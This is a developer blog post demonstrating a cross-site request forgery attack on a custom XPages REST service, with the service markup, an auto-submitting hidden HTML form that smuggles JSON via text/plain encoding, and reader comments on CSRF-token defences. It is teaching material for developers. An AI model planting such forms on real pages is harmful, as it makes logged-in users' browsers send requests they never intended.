REST & Security: CSRF Attacks

In this post I will demonstrate how a do a CSRF attack against a XPages REST service.

Let’s assume that we have a custom REST service on a XPage. To keep the example as simple as possible, this service returns the posted data back to the requesting browser only, nothing more and nothing less:

<?xml version="1.0" encoding="UTF-8"?>
<xp:view
    xmlns:xp="http://www.ibm.com/xsp/core"
    xmlns:xe="http://www.ibm.com/xsp/coreex"
    rendered="false">
    
    <xe:restService
        id="restService"
        pathInfo="foo">
        <xe:this.service>
            <xe:customRestService
                requestContentType="application/json"
                requestVar="data" 
                doPost="#{javascript:toJson( requestScope.data )}">
            </xe:customRestService>
        </xe:this.service>
    </xe:restService>

On my web server, I have created a simple HTML page with a form:

<html>
    <head />
    <body>
        <form name="CSRFAttack" enctype="text/plain"
            action="http://localhost/REST.nsf/CSRF.xsp/foo/" method="POST">
          <input type="hidden" name='{"Hello": "World"}'>
        </form> 

        <script>document.CSRFAttack.submit();</script>
    </body>
</html>

As soon a user (which is logged on my domino server) opens the HTML page, the form is automatically posted to the REST service.

1. User opens the „bad site“

2. Then the form is sent to the server

3. And the request is processed by the REST service


Et voilà, the CSRF attack was successfull.

Dieser Beitrag wurde unter REST, Security abgelegt und mit , verschlagwortet. Setze ein Lesezeichen auf den Permalink.

5 Antworten zu REST & Security: CSRF Attacks

  1. How would you suggest protecting from such an attack?

    • There are several ways to protect against CSRF attacks, but this depends upon what your RESTful service is designed for: When using it „only“ for SPA’s, you can use a CSRF token which is sent in a form field or as part of axhrRequest from the client and then validated on server side. This would block 99% of CSRF attacks.

      I will write some posts about secure REST applications next year 😉

  2. Alan Hurt sagt:

    The Domino Access Services (REST API) has the CRSF token already as a functional piece. Is this the same token as you mention?

    http://www-10.lotus.com/ldd/ddwiki.nsf/xpAPIViewer.xsp?lookupName=IBM+Domino+Access+Services+9.0.1#action=openDocument&res_title=Nonce_resource&content=apicontent

    • Yes, this token is one of these tokens which I mentioned.

      Don’t get me wrong: This is not a security issue of Domino Out-of-the-Box. It is a security issue when developing custom REST services on all platforms / application servers.

  3. Pingback: Rest & Security: More about the DominoStatelessTokenServlet | blog@hasselba.ch

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.